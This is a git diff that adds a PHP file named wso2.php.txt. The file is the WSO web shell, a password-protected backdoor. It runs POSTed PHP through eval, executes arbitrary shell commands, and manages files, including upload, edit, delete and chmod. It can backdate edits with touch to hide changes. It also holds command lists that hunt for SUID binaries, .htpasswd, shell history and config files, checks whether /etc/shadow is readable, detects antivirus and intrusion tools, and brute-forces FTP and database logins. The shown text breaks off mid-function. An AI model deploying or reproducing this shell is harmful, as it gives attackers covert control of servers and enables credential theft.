diff --git a/php/wso2.php.txt b/php/wso2.php.txt new file mode 100644 index 0000000..93e8919 --- /dev/null +++ b/php/wso2.php.txt @@ -0,0 +1,1514 @@ +
Password:
"); +} + +function WSOsetcookie($k, $v) { + $_COOKIE[$k] = $v; + setcookie($k, $v); +} + +if(!empty($auth_pass)) { + if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) + WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); + + if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) + wsoLogin(); +} + +if(strtolower(substr(PHP_OS,0,3)) == "win") + $os = 'win'; +else + $os = 'nix'; + +$safe_mode = @ini_get('safe_mode'); +if(!$safe_mode) + error_reporting(0); + +$disable_functions = @ini_get('disable_functions'); +$home_cwd = @getcwd(); +if(isset($_POST['c'])) + @chdir($_POST['c']); +$cwd = @getcwd(); +if($os == 'win') { + $home_cwd = str_replace("\\", "/", $home_cwd); + $cwd = str_replace("\\", "/", $cwd); +} +if($cwd[strlen($cwd)-1] != '/') + $cwd .= '/'; + +if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) + $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; + +if($os == 'win') + $aliases = array( + "List Directory" => "dir", + "Find index.php in current dir" => "dir /s /w /b index.php", + "Find *config*.php in current dir" => "dir /s /w /b *config*.php", + "Show active connections" => "netstat -an", + "Show running services" => "net start", + "User accounts" => "net user", + "Show computers" => "net view", + "ARP Table" => "arp -a", + "IP Configuration" => "ipconfig /all" + ); +else + $aliases = array( + "List dir" => "ls -lha", + "list file attributes on a Linux second extended file system" => "lsattr -va", + "show opened ports" => "netstat -an | grep -i listen", + "process status" => "ps aux", + "Find" => "", + "find all suid files" => "find / -type f -perm -04000 -ls", + "find suid files in current dir" => "find . -type f -perm -04000 -ls", + "find all sgid files" => "find / -type f -perm -02000 -ls", + "find sgid files in current dir" => "find . -type f -perm -02000 -ls", + "find config.inc.php files" => "find / -type f -name config.inc.php", + "find config* files" => "find / -type f -name \"config*\"", + "find config* files in current dir" => "find . -type f -name \"config*\"", + "find all writable folders and files" => "find / -perm -2 -ls", + "find all writable folders and files in current dir" => "find . -perm -2 -ls", + "find all service.pwd files" => "find / -type f -name service.pwd", + "find service.pwd files in current dir" => "find . -type f -name service.pwd", + "find all .htpasswd files" => "find / -type f -name .htpasswd", + "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", + "find all .bash_history files" => "find / -type f -name .bash_history", + "find .bash_history files in current dir" => "find . -type f -name .bash_history", + "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", + "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", + "Locate" => "", + "locate httpd.conf files" => "locate httpd.conf", + "locate vhosts.conf files" => "locate vhosts.conf", + "locate proftpd.conf files" => "locate proftpd.conf", + "locate psybnc.conf files" => "locate psybnc.conf", + "locate my.conf files" => "locate my.conf", + "locate admin.php files" =>"locate admin.php", + "locate cfg.php files" => "locate cfg.php", + "locate conf.php files" => "locate conf.php", + "locate config.dat files" => "locate config.dat", + "locate config.php files" => "locate config.php", + "locate config.inc files" => "locate config.inc", + "locate config.inc.php" => "locate config.inc.php", + "locate config.default.php files" => "locate config.default.php", + "locate config* files " => "locate config", + "locate .conf files"=>"locate '.conf'", + "locate .pwd files" => "locate '.pwd'", + "locate .sql files" => "locate '.sql'", + "locate .htpasswd files" => "locate '.htpasswd'", + "locate .bash_history files" => "locate '.bash_history'", + "locate .mysql_history files" => "locate '.mysql_history'", + "locate .fetchmailrc files" => "locate '.fetchmailrc'", + "locate backup files" => "locate backup", + "locate dump files" => "locate dump", + "locate priv files" => "locate priv" + ); + +function wsoHeader() { + if(empty($_POST['charset'])) + $_POST['charset'] = $GLOBALS['default_charset']; + global $color; + if(!$color) $color = 'white'; + echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ." + + +
+
+ + + + + + +
"; + $freeSpace = @diskfreespace($GLOBALS['cwd']); + $totalSpace = @disk_total_space($GLOBALS['cwd']); + $totalSpace = $totalSpace?$totalSpace:1; + $release = @php_uname('r'); + $kernel = @php_uname('s'); + $explink = 'http://exploit-db.com/search/?action=search&filter_description='; + if(strpos('Linux', $kernel) !== false) + $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); + else + $explink .= urlencode($kernel . ' ' . substr($release,0,3)); + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(posix_geteuid()); + $gid = @posix_getgrgid(posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; + } + + $cwd_links = ''; + $path = explode("/", $GLOBALS['cwd']); + $n=count($path); + for($i=0; $i<$n-1; $i++) { + $cwd_links .= "".$path[$i]."/"; + } + + $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); + $opt_charsets = ''; + foreach($charsets as $item) + $opt_charsets .= ''; + + $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); + if(!empty($GLOBALS['auth_pass'])) + $m['Logout'] = 'Logout'; + $m['Self remove'] = 'SelfRemove'; + $menu = ''; + foreach($m as $k => $v) + $menu .= '[ '.$k.' ]'; + + $drives = ""; + if($GLOBALS['os'] == 'win') { + foreach(range('c','z') as $drive) + if(is_dir($drive.':\\')) + $drives .= '[ '.$drive.' ] '; + } + echo '' + . '' + . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '		' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') + . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '
Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' + . '' . $menu . '
'; +} + +function wsoFooter() { + $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; + echo " +
+ + + + + + + + + + +
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
+ + + + + Upload file:$is_writable

"; +} + +if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { + function posix_getpwuid($p) {return false;} } +if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { + function posix_getgrgid($p) {return false;} } + +function wsoEx($in) { + $out = ''; + if (function_exists('exec')) { + @exec($in,$out); + $out = @join("\n",$out); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $out = ""; + while(!@feof($f)) + $out .= fread($f,1024); + pclose($f); + } + return $out; +} + +function wsoViewSize($s) { + if($s >= 1073741824) + return sprintf('%1.2f', $s / 1073741824 ). ' GB'; + elseif($s >= 1048576) + return sprintf('%1.2f', $s / 1048576 ) . ' MB'; + elseif($s >= 1024) + return sprintf('%1.2f', $s / 1024 ) . ' KB'; + else + return $s . ' B'; +} + +function wsoPerms($p) { + if (($p & 0xC000) == 0xC000)$i = 's'; + elseif (($p & 0xA000) == 0xA000)$i = 'l'; + elseif (($p & 0x8000) == 0x8000)$i = '-'; + elseif (($p & 0x6000) == 0x6000)$i = 'b'; + elseif (($p & 0x4000) == 0x4000)$i = 'd'; + elseif (($p & 0x2000) == 0x2000)$i = 'c'; + elseif (($p & 0x1000) == 0x1000)$i = 'p'; + else $i = 'u'; + $i .= (($p & 0x0100) ? 'r' : '-'); + $i .= (($p & 0x0080) ? 'w' : '-'); + $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); + $i .= (($p & 0x0020) ? 'r' : '-'); + $i .= (($p & 0x0010) ? 'w' : '-'); + $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); + $i .= (($p & 0x0004) ? 'r' : '-'); + $i .= (($p & 0x0002) ? 'w' : '-'); + $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); + return $i; +} + +function wsoPermsColor($f) { + if (!@is_readable($f)) + return '' . wsoPerms(@fileperms($f)) . ''; + elseif (!@is_writable($f)) + return '' . wsoPerms(@fileperms($f)) . ''; + else + return '' . wsoPerms(@fileperms($f)) . ''; +} + +function wsoScandir($dir) { + if(function_exists("scandir")) { + return scandir($dir); + } else { + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) + $files[] = $filename; + return $files; + } +} + +function wsoWhich($p) { + $path = wsoEx('which ' . $p); + if(!empty($path)) + return $path; + return false; +} + +function actionSecInfo() { + wsoHeader(); + echo '

Server security information

'; + function wsoSecParam($n, $v) { + $v = trim($v); + if($v) { + echo '' . $n . ': '; + if(strpos($v, "\n") === false) + echo $v . '
'; + else + echo '
' . $v . '
'; + } + } + + wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); + if(function_exists('apache_get_modules')) + wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); + wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); + wsoSecParam('Open base dir', @ini_get('open_basedir')); + wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + wsoSecParam('Supported databases', implode(', ', $temp)); + echo '
'; + + if($GLOBALS['os'] == 'nix') { + wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); + wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); + wsoSecParam('OS version', @file_get_contents('/proc/version')); + wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); + if(!$GLOBALS['safe_mode']) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + echo '
'; + $temp=array(); + foreach ($userful as $item) + if(wsoWhich($item)) + $temp[] = $item; + wsoSecParam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(wsoWhich($item)) + $temp[] = $item; + wsoSecParam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(wsoWhich($item)) + $temp[] = $item; + wsoSecParam('Downloaders', implode(', ',$temp)); + echo '
'; + wsoSecParam('HDD space', wsoEx('df -h')); + wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); + echo '
posix_getpwuid ("Read" /etc/passwd)
From
To
'; + if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { + $temp = ""; + for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { + $uid = @posix_getpwuid($_POST['p2']); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + wsoSecParam('Users', $temp); + } + } + } else { + wsoSecParam('OS Version',wsoEx('ver')); + wsoSecParam('Account Settings',wsoEx('net accounts')); + wsoSecParam('User Accounts',wsoEx('net user')); + } + echo '
'; + wsoFooter(); +} + +function actionPhp() { + if(isset($_POST['ajax'])) { + WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); + ob_start(); + eval($_POST['p1']); + $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax']) && !empty($_POST['p1'])) + WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); + + wsoHeader(); + if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { + echo '

PHP info

'; + ob_start(); + phpinfo(); + $tmp = ob_get_clean(); + $tmp = preg_replace(array ( + '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', + '!td, th {(.*)}!msiU', + '!]+>!msiU', + ), array ( + '', + '.e, .v, .h, .h th {$1}', + '' + ), $tmp); + echo str_replace('
'; + } + echo '

Execution PHP-code

'; + echo ' send using AJAX
';
+    if(!empty($_POST['p1'])) {
+        ob_start();
+        eval($_POST['p1']);
+        echo htmlspecialchars(ob_get_clean());
+    }
+    echo '
'; + wsoFooter(); +} + +function actionFilesMan() { + if (!empty ($_COOKIE['f'])) + $_COOKIE['f'] = @unserialize($_COOKIE['f']); + + if(!empty($_POST['p1'])) { + switch($_POST['p1']) { + case 'uploadFile': + if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) + echo "Can't upload file!"; + break; + case 'mkdir': + if(!@mkdir($_POST['p2'])) + echo "Can't create new dir"; + break; + case 'delete': + function deleteDir($path) { + $path = (substr($path,-1)=='/') ? $path:$path.'/'; + $dh = opendir($path); + while ( ($item = readdir($dh) ) !== false) { + $item = $path.$item; + if ( (basename($item) == "..") || (basename($item) == ".") ) + continue; + $type = filetype($item); + if ($type == "dir") + deleteDir($item); + else + @unlink($item); + } + closedir($dh); + @rmdir($path); + } + if(is_array(@$_POST['f'])) + foreach($_POST['f'] as $f) { + if($f == '..') + continue; + $f = urldecode($f); + if(is_dir($f)) + deleteDir($f); + else + @unlink($f); + } + break; + case 'paste': + if($_COOKIE['act'] == 'copy') { + function copy_paste($c,$s,$d){ + if(is_dir($c.$s)){ + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) + if (($f != ".") and ($f != "..")) + copy_paste($c.$s.'/',$f, $d.$s.'/'); + } elseif(is_file($c.$s)) + @copy($c.$s, $d.$s); + } + foreach($_COOKIE['f'] as $f) + copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); + } elseif($_COOKIE['act'] == 'move') { + function move_paste($c,$s,$d){ + if(is_dir($c.$s)){ + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) + if (($f != ".") and ($f != "..")) + copy_paste($c.$s.'/',$f, $d.$s.'/'); + } elseif(@is_file($c.$s)) + @copy($c.$s, $d.$s); + } + foreach($_COOKIE['f'] as $f) + @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); + } elseif($_COOKIE['act'] == 'zip') { + if(class_exists('ZipArchive')) { + $zip = new ZipArchive(); + if ($zip->open($_POST['p2'], 1)) { + chdir($_COOKIE['c']); + foreach($_COOKIE['f'] as $f) { + if($f == '..') + continue; + if(@is_file($_COOKIE['c'].$f)) + $zip->addFile($_COOKIE['c'].$f, $f); + elseif(@is_dir($_COOKIE['c'].$f)) { + $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); + foreach ($iterator as $key=>$value) { + $zip->addFile(realpath($key), $key); + } + } + } + chdir($GLOBALS['cwd']); + $zip->close(); + } + } + } elseif($_COOKIE['act'] == 'unzip') { + if(class_exists('ZipArchive')) { + $zip = new ZipArchive(); + foreach($_COOKIE['f'] as $f) { + if($zip->open($_COOKIE['c'].$f)) { + $zip->extractTo($GLOBALS['cwd']); + $zip->close(); + } + } + } + } elseif($_COOKIE['act'] == 'tar') { + chdir($_COOKIE['c']); + $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); + wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); + chdir($GLOBALS['cwd']); + } + unset($_COOKIE['f']); + setcookie('f', '', time() - 3600); + break; + default: + if(!empty($_POST['p1'])) { + WSOsetcookie('act', $_POST['p1']); + WSOsetcookie('f', serialize(@$_POST['f'])); + WSOsetcookie('c', @$_POST['c']); + } + break; + } + } + wsoHeader(); + echo '

File manager

'; + $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); + if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } + global $sort; + $sort = array('name', 1); + if(!empty($_POST['p1'])) { + if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) + $sort = array($match[1], (int)$match[2]); + } +echo " + +"; + $dirs = $files = array(); + $n = count($dirContent); + for($i=0;$i<$n;$i++) { + $ow = @posix_getpwuid(@fileowner($dirContent[$i])); + $gr = @posix_getgrgid(@filegroup($dirContent[$i])); + $tmp = array('name' => $dirContent[$i], + 'path' => $GLOBALS['cwd'].$dirContent[$i], + 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), + 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), + 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), + 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), + 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) + ); + if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) + $files[] = array_merge($tmp, array('type' => 'file')); + elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) + $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); + elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) + $dirs[] = array_merge($tmp, array('type' => 'dir')); + } + $GLOBALS['sort'] = $sort; + function wsoCmp($a, $b) { + if($GLOBALS['sort'][0] != 'size') + return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); + else + return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); + } + usort($files, "wsoCmp"); + usort($dirs, "wsoCmp"); + $files = array_merge($dirs, $files); + $l = 0; + foreach($files as $f) { + echo ''; + $l = $l?0:1; + } + echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] + .'R T'.(($f['type']=='file')?' E D':'').'
+ + + +  "; + if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) + echo "file name:  "; + echo "
"; + wsoFooter(); +} + +function actionStringTools() { + if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} + if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} + if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', + 'Base64 decode' => 'base64_decode', + 'Url encode' => 'urlencode', + 'Url decode' => 'urldecode', + 'Full urlencode' => 'full_urlencode', + 'md5 hash' => 'md5', + 'sha1 hash' => 'sha1', + 'crypt' => 'crypt', + 'CRC32' => 'crc32', + 'ASCII to HEX' => 'ascii2hex', + 'HEX to ASCII' => 'hex2ascii', + 'HEX to DEC' => 'hexdec', + 'HEX to BIN' => 'hex2bin', + 'DEC to HEX' => 'dechex', + 'DEC to BIN' => 'decbin', + 'BIN to HEX' => 'binhex', + 'BIN to DEC' => 'bindec', + 'String to lower case' => 'strtolower', + 'String to upper case' => 'strtoupper', + 'Htmlspecialchars' => 'htmlspecialchars', + 'String length' => 'strlen', + ); + if(isset($_POST['ajax'])) { + WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); + ob_start(); + if(in_array($_POST['p1'], $stringTools)) + echo $_POST['p1']($_POST['p2']); + $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); + wsoHeader(); + echo '

String conversions

'; + echo "
send using AJAX
";
+    if(!empty($_POST['p1'])) {
+        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+    }
+    echo"

Search files:

+
+ + + + +
Text:
Path:
Name:
"; + + function wsoRecursiveGlob($path) { + if(substr($path, -1) != '/') + $path.='/'; + $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); + if(is_array($paths)&&@count($paths)) { + foreach($paths as $item) { + if(@is_dir($item)){ + if($path!=$item) + wsoRecursiveGlob($item); + } else { + if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) + echo "".htmlspecialchars($item)."
"; + } + } + } + } + if(@$_POST['p3']) + wsoRecursiveGlob($_POST['c']); + echo "

Search for hash:

+
+
+ +
+
+
+
"; + wsoFooter(); +} + +function actionFilesTools() { + if( isset($_POST['p1']) ) + $_POST['p1'] = urldecode($_POST['p1']); + if(@$_POST['p2']=='download') { + if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); + if (function_exists("mime_content_type")) { + $type = @mime_content_type($_POST['p1']); + header("Content-Type: " . $type); + } else + header("Content-Type: application/octet-stream"); + $fp = @fopen($_POST['p1'], "r"); + if($fp) { + while(!@feof($fp)) + echo @fread($fp, 1024); + fclose($fp); + } + }exit; + } + if( @$_POST['p2'] == 'mkfile' ) { + if(!file_exists($_POST['p1'])) { + $fp = @fopen($_POST['p1'], 'w'); + if($fp) { + $_POST['p2'] = "edit"; + fclose($fp); + } + } + } + wsoHeader(); + echo '

File tools

'; + if( !file_exists(@$_POST['p1']) ) { + echo 'File not exists'; + wsoFooter(); + return; + } + $uid = @posix_getpwuid(@fileowner($_POST['p1'])); + if(!$uid) { + $uid['name'] = @fileowner($_POST['p1']); + $gid['name'] = @filegroup($_POST['p1']); + } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); + echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; + echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; + if( empty($_POST['p2']) ) + $_POST['p2'] = 'view'; + if( is_file($_POST['p1']) ) + $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); + else + $m = array('Chmod', 'Rename', 'Touch'); + foreach($m as $v) + echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; + echo '

'; + switch($_POST['p2']) { + case 'view': + echo '
';
+            $fp = @fopen($_POST['p1'], 'r');
+            if($fp) {
+                while( !@feof($fp) )
+                    echo htmlspecialchars(@fread($fp, 1024));
+                @fclose($fp);
+            }
+            echo '
'; + break; + case 'highlight': + if( @is_readable($_POST['p1']) ) { + echo '
'; + $code = @highlight_file($_POST['p1'],true); + echo str_replace(array(''), array(''),$code).'
'; + } + break; + case 'chmod': + if( !empty($_POST['p3']) ) { + $perms = 0; + for($i=strlen($_POST['p3'])-1;$i>=0;--$i) + $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); + if(!@chmod($_POST['p1'], $perms)) + echo 'Can\'t set permissions!
'; + } + clearstatcache(); + echo '
'; + break; + case 'edit': + if( !is_writable($_POST['p1'])) { + echo 'File isn\'t writeable'; + break; + } + if( !empty($_POST['p3']) ) { + $time = @filemtime($_POST['p1']); + $_POST['p3'] = substr($_POST['p3'],1); + $fp = @fopen($_POST['p1'],"w"); + if($fp) { + @fwrite($fp,$_POST['p3']); + @fclose($fp); + echo 'Saved!
'; + @touch($_POST['p1'],$time,$time); + } + } + echo '
'; + break; + case 'hexdump': + $c = @file_get_contents($_POST['p1']); + $n = 0; + $h = array('00000000
','',''); + $len = strlen($c); + for ($i=0; $i<$len; ++$i) { + $h[1] .= sprintf('%02X',ord($c[$i])).' '; + switch ( ord($c[$i]) ) { + case 0: $h[2] .= ' '; break; + case 9: $h[2] .= ' '; break; + case 10: $h[2] .= ' '; break; + case 13: $h[2] .= ' '; break; + default: $h[2] .= $c[$i]; break; + } + $n++; + if ($n == 32) { + $n = 0; + if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} + $h[1] .= '
'; + $h[2] .= "\n"; + } + } + echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; + break; + case 'rename': + if( !empty($_POST['p3']) ) { + if(!@rename($_POST['p1'], $_POST['p3'])) + echo 'Can\'t rename!
'; + else + die(''); + } + echo '
'; + break; + case 'touch': + if( !empty($_POST['p3']) ) { + $time = strtotime($_POST['p3']); + if($time) { + if(!touch($_POST['p1'],$time,$time)) + echo 'Fail!'; + else + echo 'Touched!'; + } else echo 'Bad time format!'; + } + clearstatcache(); + echo '
'; + break; + } + echo '
'; + wsoFooter(); +} + +function actionConsole() { + if(!empty($_POST['p1']) && !empty($_POST['p2'])) { + WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); + $_POST['p1'] .= ' 2>&1'; + } elseif(!empty($_POST['p1'])) + WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); + + if(isset($_POST['ajax'])) { + WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); + ob_start(); + echo "d.cf.cmd.value='';\n"; + $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); + if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { + if(@chdir($match[1])) { + $GLOBALS['cwd'] = @getcwd(); + echo "c_='".$GLOBALS['cwd']."';"; + } + } + echo "d.cf.output.value+='".$temp."';"; + echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; + $temp = ob_get_clean(); + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); + wsoHeader(); + echo ""; + echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; + echo '
'; + wsoFooter(); +} + +function actionLogout() { + setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); + die('bye!'); +} + +function actionSelfRemove() { + + if($_POST['p1'] == 'yes') + if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) + die('Shell has been removed'); + else + echo 'unlink error!'; + if($_POST['p1'] != 'yes') + wsoHeader(); + echo '

Suicide

Really want to remove the shell?
Yes
'; + wsoFooter(); +} + +function actionBruteforce() { + wsoHeader(); + if( isset($_POST['proto']) ) { + echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; + if( $_POST['proto'] == 'ftp' ) { + function wsoBruteForce($ip,$port,$login,$pass) { + $fp = @ftp_connect($ip, $port?$port:21); + if(!$fp) return false; + $res = @ftp_login($fp, $login, $pass); + @ftp_close($fp); + return $res; + } + } elseif( $_POST['proto'] == 'mysql' ) { + function wsoBruteForce($ip,$port,$login,$pass) { + $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); + @mysql_close($res); + return $res; + } + } elseif( $_POST['proto'] == 'pgsql' ) { + function wsoBruteForce($ip,$port,$login,$pass) { + $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; + $res = @pg_connect($str); + @pg_close($res); + return $res; + } + } + $success = 0; + $attempts = 0; + $server = explode(":", $_POST['server']); + if($_POST['type'] == 1) { + $temp = @file('/etc/passwd'); + if( is_array($temp) ) + foreach($temp as $line) { + $line = explode(":", $line); + ++$attempts; + if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
